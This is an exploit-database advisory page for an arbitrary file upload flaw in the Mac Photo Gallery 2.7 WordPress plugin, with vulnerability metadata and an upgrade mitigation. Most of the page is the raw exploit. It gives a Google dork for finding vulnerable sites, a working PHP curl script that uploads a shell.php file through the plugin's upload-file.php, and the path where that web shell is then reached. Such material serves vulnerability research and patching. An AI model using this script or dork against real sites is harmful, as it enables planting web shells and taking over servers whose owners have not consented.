Wordpress Mac Photo Gallery 2.7 Arbitrary File Upload

vendor:

Mac Photo Gallery

by:

Adrien Thierry

8,8

CVSS

HIGH

Arbitrary File Upload

434

CWE

Product Name: Mac Photo Gallery

Affected Version From: 2.7

Affected Version To: 2.7

Patch Exists: Yes

Related CWE: N/A

CPE: a:apptha:mac_photo_gallery:2.7

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: Wordpress

2012

WordPress Mac Photo Gallery 2.7 Arbitrary File Upload

An arbitrary file upload vulnerability exists in Mac Photo Gallery 2.7 for Wordpress. An attacker can exploit this vulnerability by sending a malicious file to the upload-file.php page of the plugin. This can be done by using a CURL request with the malicious file as a parameter. The malicious file can then be accessed at the specified URL.

Mitigation:

Upgrade to the latest version of Mac Photo Gallery for Wordpress.

Source

Exploit-DB raw data:

###########################################################
#
# Exploit Title: Wordpress Mac Photo Gallery 2.7 Arbitrary File Upload
# Google Dork: inurl:wp-content/plugins/mac-dock-gallery/
# Date: 11/06/2012
# Exploit Author: Adrien Thierry
# Vendor Homepage:  http://www.apptha.com
# Software Link: http://downloads.wordpress.org/plugin/mac-dock-gallery.2.7.zip
# Version: 2.7
#
###########################################################

Vuln page : http://mysite.com/wp-content/plugins/mac-dock-gallery/upload-file.php

exploit :

<?php
$u="C:\Program Files (x86)\EasyPHP-5.3.9\www\shell.php";
$c = curl_init("http://127.0.0.1/wordpress/wp-content/plugins/mac-dock-gallery/upload-file.php");
curl_setopt($c, CURLOPT_POST, true);
curl_setopt($c, CURLOPT_POSTFIELDS,
array('uploadfile'=>"@$u",
'albumId'=>"1",
'mode'=>"image"));
curl_setopt($c, CURLOPT_RETURNTRANSFER, 1);
$e = curl_exec($c);
curl_close($c);
echo $e; 
?>

shell access : http://mysite.com/wp-content/uploads/mac-dock-gallery/shell.php

#####################################################################